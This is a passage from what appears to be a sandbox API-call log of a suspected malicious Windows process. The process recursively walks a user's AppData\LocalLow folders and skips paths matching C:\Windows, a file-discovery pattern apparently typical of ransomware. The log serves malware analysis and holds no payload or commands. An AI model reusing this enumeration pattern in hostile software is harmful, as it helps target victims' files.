HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\itl") returned 105 [0057.625] lstrcmpiW (lpString1="C:\\Windows", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\itl") returned 1 [0057.625] lstrlenW (lpString="itl") returned 3 [0057.625] lstrcmpiW (lpString1="C:\\Windows", lpString2="itl") returned -1 [0057.625] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xfffe) returned 0x3fe70d0 [0057.625] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\itl") returned 105 [0057.625] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\itl\\*", lpFindFileData=0x2f2e6a4 | out: lpFindFileData=0x2f2e6a4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xea6d44d0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xea6d44d0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xea6d44d0, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6c4228 [0057.625] FindNextFileW (in: hFindFile=0x6c4228, lpFindFileData=0x2f2e6a4 | out: lpFindFileData=0x2f2e6a4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xea6d44d0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xea6d44d0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xea6d44d0, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0057.625] FindNextFileW (in: hFindFile=0x6c4228, lpFindFileData=0x2f2e6a4 | out: lpFindFileData=0x2f2e6a4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xea6d44d0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xea6d44d0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xea6d44d0, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0057.626] FindClose (in: hFindFile=0x6c4228 | out: hFindFile=0x6c4228) returned 1 [0057.626] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x3fe70d0 | out: hHeap=0x5d0000) returned 1 [0057.626] FindNextFileW (in: hFindFile=0x6c42e8, lpFindFileData=0x2f2e920 | out: lpFindFileData=0x2f2e920*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeb90f4b0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xeb90f4b0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xeb90f4b0, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="nrw", cAlternateFileName="")) returned 1 [0057.626] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\nrw") returned 105 [0057.626] lstrcmpiW (lpString1="C:\\Windows", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\nrw") returned 1 [0057.626] lstrlenW (lpString="nrw") returned 3 [0057.626] lstrcmpiW (lpString1="C:\\Windows", lpString2="nrw") returned -1 [0057.626] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xfffe) returned 0x3fe70d0 [0057.626] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\nrw") returned 105 [0057.626] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\nrw\\*", lpFindFileData=0x2f2e6a4 | out: lpFindFileData=0x2f2e6a4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeb90f4b0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xeb90f4b0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xeb90f4b0, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6c4228 [0057.627] FindNextFileW (in: hFindFile=0x6c4228, lpFindFileData=0x2f2e6a4 | out: lpFindFileData=0x2f2e6a4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeb90f4b0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xeb90f4b0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xeb90f4b0, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0057.627] FindNextFileW (in: hFindFile=0x6c4228, lpFindFileData=0x2f2e6a4 | out: lpFindFileData=0x2f2e6a4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeb90f4b0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xeb90f4b0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xeb90f4b0, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0057.627] FindClose (in: hFindFile=0x6c4228 | out: hFindFile=0x6c4228) returned 1 [0057.627] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x3fe70d0 | out: hHeap=0x5d0000) returned 1 [0057.627] FindNextFileW (in: hFindFile=0x6c42e8, lpFindFileData=0x2f2e920 | out: lpFindFileData=0x2f2e920*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xec2489f0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xec2489f0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xec2489f0, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="prt", cAlternateFileName="")) returned 1 [0057.627] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\prt") returned 105 [0057.627] lstrcmpiW (lpString1="C:\\Windows", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\prt") returned 1 [0057.627] lstrlenW (lpString="prt") returned 3 [0057.627] lstrcmpiW (lpString1="C:\\Windows", lpString2="prt") returned -1 [0057.627] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xfffe) returned 0x3fe70d0 [0057.627] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\prt") returned 105 [0057.627] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\prt\\*", lpFindFileData=0x2f2e6a4 | out: lpFindFileData=0x2f2e6a4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xec2489f0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xec2489f0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xec2489f0, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6c4228 [0057.627] FindNextFileW (in: hFindFile=0x6c4228, lpFindFileData=0x2f2e6a4 | out: lpFindFileData=0x2f2e6a4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xec2489f0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xec2489f0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xec2489f0, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0057.627] FindNextFileW (in: hFindFile=0x6c4228, lpFindFileData=0x2f2e6a4 | out: lpFindFileData=0x2f2e6a4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xec2489f0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xec2489f0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xec2489f0, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0057.627] FindClose (in: hFindFile=0x6c4228 | out: hFindFile=0x6c4228) returned 1 [0057.627] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x3fe70d0 | out: hHeap=0x5d0000) returned 1 [0057.627] FindNextFileW (in: hFindFile=0x6c42e8, lpFindFileData=0x2f2e920 | out: lpFindFileData=0x2f2e920*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xea237a30, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xea237a30, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xea237a30, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="spn", cAlternateFileName="")) returned 1 [0057.627] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\spn") returned 105 [0057.627] lstrcmpiW (lpString1="C:\\Windows", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\spn") returned 1 [0057.628] lstrlenW (lpString="spn") returned 3 [0057.628] lstrcmpiW (lpString1="C:\\Windows", lpString2="spn") returned -1 [0057.628] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xfffe) returned 0x3fe70d0 [0057.628] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\spn") returned 105 [0057.628] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\spn\\*", lpFindFileData=0x2f2e6a4 | out: lpFindFileData=0x2f2e6a4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xea237a30, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xea237a30, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xea237a30, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6c4228 [0057.628] FindNextFileW (in: hFindFile=0x6c4228, lpFindFileData=0x2f2e6a4 | out: lpFindFileData=0x2f2e6a4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xea237a30, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xea237a30, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xea237a30, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0057.628] FindNextFileW (in: hFindFile=0x6c4228, lpFindFileData=0x2f2e6a4 | out: lpFindFileData=0x2f2e6a4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xea237a30, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xea237a30, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xea237a30, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0057.628] FindClose (in: hFindFile=0x6c4228 | out: hFindFile=0x6c4228) returned 1 [0057.628] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x3fe70d0 | out: hHeap=0x5d0000) returned 1 [0057.628] FindNextFileW (in: hFindFile=0x6c42e8, lpFindFileData=0x2f2e920 | out: lpFindFileData=0x2f2e920*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeaffa190, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xeaffa190, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xeaffa190, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="swd", cAlternateFileName="")) returned 1 [0057.628] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\swd") returned 105 [0057.628] lstrcmpiW (lpString1="C:\\Windows", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\swd") returned 1 [0057.628] lstrlenW (lpString="swd") returned 3 [0057.628] lstrcmpiW (lpString1="C:\\Windows", lpString2="swd") returned -1 [0057.628] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xfffe) returned 0x3fe70d0 [0057.628] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\swd") returned 105 [0057.628] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\swd\\*", lpFindFileData=0x2f2e6a4 | out: lpFindFileData=0x2f2e6a4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeaffa190, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xeaffa190, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xeaffa190, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6c4228 [0057.628] FindNextFileW (in: hFindFile=0x6c4228, lpFindFileData=0x2f2e6a4 | out: lpFindFileData=0x2f2e6a4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeaffa190, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xeaffa190, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xeaffa190, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0057.628] FindNextFileW (in: hFindFile=0x6c4228, lpFindFileData=0x2f2e6a4 | out: lpFindFileData=0x2f2e6a4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeaffa190, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xeaffa190, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xeaffa190, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0057.628] FindClose (in: hFindFile=0x6c4228 | out: hFindFile=0x6c4228) returned 1 [0057.629] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x3fe70d0 | out: hHeap=0x5d0000) returned 1 [0057.629] FindNextFileW (in: hFindFile=0x6c42e8, lpFindFileData=0x2f2e920 | out: lpFindFileData=0x2f2e920*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeaffa190, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xeaffa190, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xeaffa190, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="swd", cAlternateFileName="")) returned 0 [0057.629] FindClose (in: hFindFile=0x6c42e8 | out: hFindFile=0x6c42e8) returned 1 [0057.629] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x40070e0 | out: hHeap=0x5d0000) returned 1 [0057.629] FindNextFileW (in: hFindFile=0x6c4268, lpFindFileData=0x2f2eb9c | out: lpFindFileData=0x2f2eb9c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe82613f0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xec6bf330, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xec6bf330, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Adobe Custom Dictionary", cAlternateFileName="ADOBEC~1")) returned 0 [0057.629] FindClose (in: hFindFile=0x6c4268 | out: hFindFile=0x6c4268) returned 1 [0057.629] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x3fd70c8 | out: hHeap=0x5d0000) returned 1 [0057.629] FindNextFileW (in: hFindFile=0x6c4068, lpFindFileData=0x2f2ee18 | out: lpFindFileData=0x2f2ee18*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xe82613f0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xe82613f0, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Dictionaries", cAlternateFileName="DICTIO~1")) returned 0 [0057.630] FindClose (in: hFindFile=0x6c4068 | out: hFindFile=0x6c4068) returned 1 [0057.630] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x3fc70c0 | out: hHeap=0x5d0000) returned 1 [0057.631] FindNextFileW (in: hFindFile=0x6c41e8, lpFindFileData=0x2f2f094 | out: lpFindFileData=0x2f2f094*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd708940, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd708940, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Linguistics", cAlternateFileName="LINGUI~1")) returned 0 [0057.631] FindClose (in: hFindFile=0x6c41e8 | out: hFindFile=0x6c41e8) returned 1 [0057.631] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x3f60080 | out: hHeap=0x5d0000) returned 1 [0057.632] FindNextFileW (in: hFindFile=0x6c4128, lpFindFileData=0x2f2f310 | out: lpFindFileData=0x2f2f310*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xcd708940, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd708940, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft", cAlternateFileName="MICROS~1")) returned 1 [0057.632] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft") returned 56 [0057.632] lstrcmpiW (lpString1="C:\\Windows", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft") returned 1 [0057.632] lstrlenW (lpString="Microsoft") returned 9 [0057.632] lstrcmpiW (lpString1="C:\\Windows", lpString2="Microsoft") returned -1 [0057.633] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xfffe) returned 0x3f30068 [0057.633] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft") returned 56 [0057.633] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\*", lpFindFileData=0x2f2f094 | out: lpFindFileData=0x2f2f094*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xcd708940, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd708940, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6c41e8 [0057.907] FindNextFileW (in: hFindFile=0x6c41e8, lpFindFileData=0x2f2f094 | out: lpFindFileData=0x2f2f094*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xcd708940, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd708940, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0057.907] FindNextFileW (in: hFindFile=0x6c41e8, lpFindFileData=0x2f2f094 | out: lpFindFileData=0x2f2f094*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28cff640, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x23a43389, ftLastWriteTime.dwHighDateTime=0x1cb892f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="CryptnetUrlCache", cAlternateFileName="CRYPTN~1")) returned 1 [0057.907] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache") returned 73 [0057.907] lstrcmpiW (lpString1="C:\\Windows", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache") returned 1 [0057.907] lstrlenW (lpString="CryptnetUrlCache") returned 16 [0057.907] lstrcmpiW (lpString1="C:\\Windows", lpString2="CryptnetUrlCache") returned -1 [0057.907] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xfffe) returned 0x3f40070 [0057.907] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache") returned 73 [0057.907] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\*", lpFindFileData=0x2f2ee18 | out: lpFindFileData=0x2f2ee18*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28cff640, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x23a43389, ftLastWriteTime.dwHighDateTime=0x1cb892f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6c4068 [0057.907] FindNextFileW (in: hFindFile=0x6c4068, lpFindFileData=0x2f2ee18 | out: lpFindFileData=0x2f2ee18*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28cff640, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x23a43389, ftLastWriteTime.dwHighDateTime=0x1cb892f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0057.907] FindNextFileW (in: hFindFile=0x6c4068, lpFindFileData=0x2f2ee18 | out: lpFindFileData=0x2f2ee18*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xd0de60b0, ftLastAccessTime.dwHighDateTime=0x1d2faf2, ftLastWriteTime.dwLowDateTime=0xd0de60b0, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Content", cAlternateFileName="")) returned 1 [0057.907] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content") returned 81 [0057.907] lstrcmpiW (lpString1="C:\\Windows", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content") returned 1 [0057.907] lstrlenW (lpString="Content") returned 7 [0057.907] lstrcmpiW (lpString1="C:\\Windows", lpString2="Content") returned -1 [0057.907] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xfffe) returned 0x3f50078 [0057.907] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content") returned 81 [0057.907] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\*", lpFindFileData=0x2f2eb9c | out: lpFindFileData=0x2f2eb9c*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xd0de60b0, ftLastAccessTime.dwHighDateTime=0x1d2faf2, ftLastWriteTime.dwLowDateTime=0xd0de60b0, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6c4268 [0057.908] FindNextFileW (in: hFindFile=0x6c4268, lpFindFileData=0x2f2eb9c | out: lpFindFileData=0x2f2eb9c*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, 